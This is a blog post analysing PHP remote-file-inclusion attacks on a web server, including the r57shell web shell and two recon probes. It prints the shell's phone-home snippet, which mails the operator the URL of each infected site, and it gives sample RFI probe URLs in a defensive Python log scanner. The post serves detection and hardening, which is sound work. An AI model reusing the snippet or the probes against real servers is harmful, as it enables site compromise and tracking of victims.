More Web Server Hackattacks
Currently this webserver is undergoing a barrage of attempted break-ins. Time to have a look at some, starting with the most fully-featured and pleasant-looking one.
The tool behind this attack is "r57shell" version 1.3, a PHP web shell. Nice to know that it's not a beta and is actively being improved. The script is hosted here, there and everywhere, and there seem to be slight local variations. The one I am going to show here is called "id.txt" and is hosted at ripway.com.
Should your server be vulnerable to this sort of remote file inclusion (a PHP include() that fetches and runs a script from a URL supplied in the request), it will give the hacker access to your system, in this case through a very functional interface. I have generated an HTML file from the PHP script displaying the screen; it is linked from this post. (It has been sanitized: no working buttons or links.)
Embedded within the PHP script was C source code for opening a socket back to the attacker's machine (a back-connect shell), as well as a phone-home feature that e-mails the shell's operator (sexycrunch@yahoo.com, and the same name at gmail.com) the address of the page it has just been injected into:
```php
<?php
// Phone-home snippet from the shell. The page shows it assigned to $a as a
// string; single quotes are used here so the snippet parses as PHP, and the
// body is laid out and commented but otherwise unchanged. The Indonesian
// strings mean: "ada yang inject" = "someone injected", "setoran pak" = "deposit, sir".
$a = '
$visitcount = $HTTP_COOKIE_VARS["visits"];   // cookie marks a browser that has already reported
if ($visitcount == "") {
    $visitcount = 0;
    $web = $_SERVER["HTTP_HOST"];            // the victim host ...
    $inj = $_SERVER["REQUEST_URI"];          // ... and the request that injected the shell
    $body = "ada yang inject \n$web$inj";
    // e-mail the operator the URL of the freshly injected shell, at both addresses
    mail("sexycrunch@yahoo.com", "setoran pak http://$web$inj", "$body");
    mail("sexycrunch@gmail.com", "setoran pak http://$web$inj", "$body");
} else $visitcount;
setcookie("visits", $visitcount);
';
```
If the inclusion succeeds, the attacker has a file manager and command prompt running as the web server's user: he can upload whatever he wants, spread more malicious code around, distribute warez, or whatever takes his fancy.
After such a beautifully executed hack, the next one is quite boring. Hosted on concurs.org, a Russian site, is a script belonging to "Osirys" which would have given him the following output had it worked:
```text
Osirys
uid=48(apache) gid=48(apache) groups=48(apache)
0sirys was here ..
uname -a: Linux SCARY.stupid4trying.com 2.6.9-42.cc #1 Wed Sep 13 19:47:22 EDT 2006 i686
os: Linux
id: uid=48(apache) gid=48(apache) groups=48(apache)
free: 5.85 Gb  used: 3.23 Gb  total: 9.09 Gb
```
And lastly, "Mic22" doesn't want to know very much at all, at least to start with:
```text
Mic22
OSTYPE: Linux
Kernel: Linux SCARY.stupid4trying.com 2.6.9-42.cc #1 Wed Sep 13 19:47:22 EDT 2006 i686
Free: 5.85 GB
uid=48(apache) gid=48(apache) groups=48(apache)
```
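Every one of these probes arrives the same way: a request whose parameter value is a URL on the attacker's host (ripway.com, concurs.org) that a remote-file-inclusion hole on the target would fetch and run. The following is an added example, not code from this post or from any of the scripts described: a small Python script that picks such requests out of Apache combined-format access log lines. The client IPs, local paths, parameter names and the paths under ripway.com and concurs.org in the sample log are constructed for the example; only the hosting sites come from the post.

```python
"""Pick remote-file-inclusion (RFI) probes out of an Apache access log.

Added example, not from the original post. SAMPLE_LOG below is constructed:
the client IPs, local paths, parameter names and the paths under ripway.com
and concurs.org are made up for illustration.
"""
import re
import sys
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# A parameter whose value is a URL on another host is the RFI signature:
# the target's include() is being pointed at a script the attacker hosts,
# usually served as .txt so the hosting site sends the PHP source unexecuted.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def find_rfi(line):
    """Return (client_ip, parameter, remote_url) for an RFI probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m.group('target')).query
    # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if REMOTE_RE.match(value):
            return (m.group('ip'), name, value)
    return None


def scan(lines):
    """Scan an iterable of log lines and return the list of RFI hits."""
    return [hit for hit in map(find_rfi, lines) if hit]


# Constructed sample: three probes (one percent-encoded) and two normal requests.
# The trailing "?" on the first URL is the usual RFI trick: whatever the
# vulnerable script appends (".php", "/header.inc", ...) lands in the query
# string sent to the attacker's host instead of changing the path.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2007:03:14:07 +0000] "GET /index.php?page=http://ripway.com/example/id.txt? HTTP/1.1" 200 4123 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Jan/2007:03:15:22 +0000] "GET /index.php?page=about HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
203.0.113.77 - - [10/Jan/2007:04:01:45 +0000] "GET /modules/mod.php?path=http://concurs.org/example/osirys.txt?? HTTP/1.0" 404 301 "-" "libwww-perl/5.805"
198.51.100.9 - - [10/Jan/2007:04:02:10 +0000] "GET /style.css HTTP/1.1" 200 911 "-" "Mozilla/5.0"
203.0.113.78 - - [10/Jan/2007:04:30:02 +0000] "GET /admin/?inc=http%3A%2F%2Fconcurs.org%2Fexample%2Fmic22.txt HTTP/1.1" 200 3008 "-" "Mozilla/4.0"
"""

if __name__ == '__main__':
    # Pass a real access_log path to scan it; otherwise the sample runs.
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_LOG.splitlines()
    for ip, param, url in scan(lines):
        print(f'{ip}\t{param}\t{url}')
```

Each hit gives you the three things worth acting on: the client to block, the parameter the vulnerable application exposes, and the attacker-hosted script you can fetch (as text, from a machine that matters little) to see what it would have done. Matching on the decoded parameter value rather than on the raw request line is what lets the percent-encoded probe in the sample be caught too.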
All these attacks work on webservers running AppServ. They also all depend on the same PHP behaviour: include() being allowed to fetch a file from a remote URL (governed by allow_url_fopen, and from PHP 5.2 onwards also by allow_url_include); with that switched off, a request carrying the attacker's script URL has nothing to run. From the AppServ people comes this advice:
How the AppServ versions differ.
AppServ Version
2.4.x is a superb stable version that works for all users; by the way, this version uses PHP 4.x because it works fine with your old PHP code.
2.5.x is the Rock function. This version provides the newest and experimental versions of Apache, PHP and MySQL.
Recommendation for AppServ
We recommend to all AppServ users: do not upgrade to a new version every time one is released. Select a version for your work if you think that version is stable for you. A new version does not mean a good one.
An old version doesn't mean a good one either, though...